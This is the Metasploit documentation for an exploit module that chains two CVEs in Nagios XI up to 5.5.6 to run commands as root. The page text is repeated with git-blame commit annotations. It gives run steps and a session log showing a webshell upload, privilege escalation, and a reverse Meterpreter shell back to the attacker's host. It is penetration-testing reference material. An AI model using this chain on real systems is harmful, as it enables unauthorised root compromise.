documentation/modules/exploit/linux/http/nagios_xi_magpie_debug.md

## Vulnerable Application

This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
CVE-2018-15708 which allows for unauthenticated remote code execution
and CVE-2018-15710 which allows for local privilege escalation.
When combined, these two vulnerabilities allow execution of arbitrary
commands as root.

The exploit works as follows:

- A local HTTPS server is setup. When it is reached, this server responds with a payload.
- By crafting a malicious request, we make the target host send a request to our HTTPS server.
  - The local HTTPS server must be reachable from the Nagios host.
  - The `RSRVHOST` and `RSRVPORT` options are used to specify the HTTPS server host and port.
- A PHP webshell and payload executable are uploaded via `magpie_debug.php`.
- A command is executed via the webshell. This command elevates privileges and runs the payload executable.

## Verification Steps

Download a vulnerable version of the Nagios XI virtual appliance:

* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.10-64.ova
* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.13-64.ova
* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.5.0-64.ova
* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.5.6-64.ova

Or download a [vulnerable application installer](https://www.nagios.com/downloads/nagios-xi/older-releases/) and follow the
[installation instructions](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).

Metasploit:

1. `msfconsole`
1. `use exploit/linux/http/nagios_xi_magpie_debug`
1. `set RHOSTS [IP]`
1. `set RSRVHOST [IP]`
1. `exploit`
1. You should get a new session with *root* privileges

## Options

### RSRVHOST

IP address at which the local HTTPS server can be reached.
Most of the time it will be a public IP (e.g. your router IP if you have port forwarding).

### RSRVPORT

Port at which the local HTTPS server can be reached.

## Scenarios

## NagiosXI 5.5.6 (x64) virtual appliance

```
msf > use exploit/linux/http/nagios_xi_magpie_debug
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/nagios_xi_magpie_debug) > set rhosts 10.1.1.113
rhosts => 10.1.1.113
msf exploit(linux/http/nagios_xi_magpie_debug) > set rsrvhost 10.1.1.114
rsrvhost => 10.1.1.114
msf exploit(linux/http/nagios_xi_magpie_debug) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.1.1.114:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Found MagpieRSS.
[*] Using URL: https://0.0.0.0:8080/iRtxnl8L
[*] Local IP: https://10.1.1.114:8080/iRtxnl8L
[*] Server started.
[*] Uploading to /usr/local/nagvis/share/fbHGUhauqtV.php ...
[+] fbHGUhauqtV.php uploaded successfully!
[*] Using URL: https://0.0.0.0:8080/YvyES7YlFee8R
[*] Local IP: https://10.1.1.114:8080/YvyES7YlFee8R
[*] Server started.
[*] Uploading to /usr/local/nagvis/share/nYRTioXKBam ...
[+] nYRTioXKBam uploaded successfully!
[*] Checking PHP web shell: /nagvis/fbHGUhauqtV.php
[+] Success! Commands executed as user: uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
[*] Attempting privilege escalation ...
[*] Sending stage (3008420 bytes) to 10.1.1.113
[*] Meterpreter session 1 opened (10.1.1.114:4444 -> 10.1.1.113:42314) at 2021-03-16 02:58:20 -0400
[+] Deleted /usr/local/nagvis/share/fbHGUhauqtV.php
[+] Deleted /usr/local/nagvis/share/nYRTioXKBam
[!] This exploit may require manual cleanup of '/var/tmp/hRyNmrQHZAq.nse' on the target
[*] Server stopped.

msf exploit(linux/http/nagios_xi_magpie_debug) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.5.1804 (Linux 3.10.0-862.14.4.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
vulnerable application h1 to h2 2020-01-16 10:44:35 -05:00			`## Vulnerable Application`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`This module exploits two vulnerabilities in Nagios XI <= 5.5.6:`
			`CVE-2018-15708 which allows for unauthenticated remote code execution`
			`and CVE-2018-15710 which allows for local privilege escalation.`
			`When combined, these two vulnerabilities allow execution of arbitrary`
			`commands as root.`
Change doc name 2019-06-25 16:16:32 -05:00
			`The exploit works as follows:`

			`- A local HTTPS server is setup. When it is reached, this server responds with a payload.`
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`- By crafting a malicious request, we make the target host send a request to our HTTPS server.`
			`- The local HTTPS server must be reachable from the Nagios host.`
			- The `RSRVHOST` and `RSRVPORT` options are used to specify the HTTPS server host and port.
			- A PHP webshell and payload executable are uploaded via `magpie_debug.php`.
			`- A command is executed via the webshell. This command elevates privileges and runs the payload executable.`
Change doc name 2019-06-25 16:16:32 -05:00
h1 to h2 2020-01-16 11:46:36 -05:00			`## Verification Steps`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`Download a vulnerable version of the Nagios XI virtual appliance:`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.10-64.ova`
			`* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.4.13-64.ova`
			`* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.5.0-64.ova`
			`* https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.5.6-64.ova`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`Or download a [vulnerable application installer](https://www.nagios.com/downloads/nagios-xi/older-releases/) and follow the`
			`[installation instructions](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`Metasploit:`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			1. `msfconsole`
			1. `use exploit/linux/http/nagios_xi_magpie_debug`
			1. `set RHOSTS [IP]`
			1. `set RSRVHOST [IP]`
			1. `exploit`
			`1. You should get a new session with root privileges`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`## Options`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`### RSRVHOST`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`IP address at which the local HTTPS server can be reached.`
			`Most of the time it will be a public IP (e.g. your router IP if you have port forwarding).`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`### RSRVPORT`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`Port at which the local HTTPS server can be reached.`
Change doc name 2019-06-25 16:16:32 -05:00
more standardizations 2020-01-16 11:32:02 -05:00			`## Scenarios`
Change doc name 2019-06-25 16:16:32 -05:00
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`## NagiosXI 5.5.6 (x64) virtual appliance`
Change doc name 2019-06-25 16:16:32 -05:00
			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/linux/http/nagios_xi_magpie_debug`
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/nagios_xi_magpie_debug) > set rhosts 10.1.1.113`
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`rhosts => 10.1.1.113`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/nagios_xi_magpie_debug) > set rsrvhost 10.1.1.114`
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`rsrvhost => 10.1.1.114`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/nagios_xi_magpie_debug) > run`
Change doc name 2019-06-25 16:16:32 -05:00			`[*] Exploit running as background job 0.`
			`[*] Exploit completed, but no session was created.`

nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`[*] Started reverse TCP handler on 10.1.1.114:4444`
			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] The target appears to be vulnerable. Found MagpieRSS.`
			`[*] Using URL: https://0.0.0.0:8080/iRtxnl8L`
			`[*] Local IP: https://10.1.1.114:8080/iRtxnl8L`
Change doc name 2019-06-25 16:16:32 -05:00			`[*] Server started.`
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`[*] Uploading to /usr/local/nagvis/share/fbHGUhauqtV.php ...`
			`[+] fbHGUhauqtV.php uploaded successfully!`
			`[*] Using URL: https://0.0.0.0:8080/YvyES7YlFee8R`
			`[*] Local IP: https://10.1.1.114:8080/YvyES7YlFee8R`
Change doc name 2019-06-25 16:16:32 -05:00			`[*] Server started.`
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`[*] Uploading to /usr/local/nagvis/share/nYRTioXKBam ...`
			`[+] nYRTioXKBam uploaded successfully!`
			`[*] Checking PHP web shell: /nagvis/fbHGUhauqtV.php`
			`[+] Success! Commands executed as user: uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)`
			`[*] Attempting privilege escalation ...`
			`[*] Sending stage (3008420 bytes) to 10.1.1.113`
			`[*] Meterpreter session 1 opened (10.1.1.114:4444 -> 10.1.1.113:42314) at 2021-03-16 02:58:20 -0400`
			`[+] Deleted /usr/local/nagvis/share/fbHGUhauqtV.php`
			`[+] Deleted /usr/local/nagvis/share/nYRTioXKBam`
			`[!] This exploit may require manual cleanup of '/var/tmp/hRyNmrQHZAq.nse' on the target`
Change doc name 2019-06-25 16:16:32 -05:00			`[*] Server stopped.`

Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/nagios_xi_magpie_debug) > sessions -i 1`
Change doc name 2019-06-25 16:16:32 -05:00			`[*] Starting interaction with 1...`

			`meterpreter > getuid`
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`Server username: root @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)`
Change doc name 2019-06-25 16:16:32 -05:00			`meterpreter > sysinfo`
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`Computer : localhost.localdomain`
			`OS : CentOS 7.5.1804 (Linux 3.10.0-862.14.4.el7.x86_64)`
Change doc name 2019-06-25 16:16:32 -05:00			`Architecture : x64`
nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 07:13:55 +00:00			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter >`
Change doc name 2019-06-25 16:16:32 -05:00			```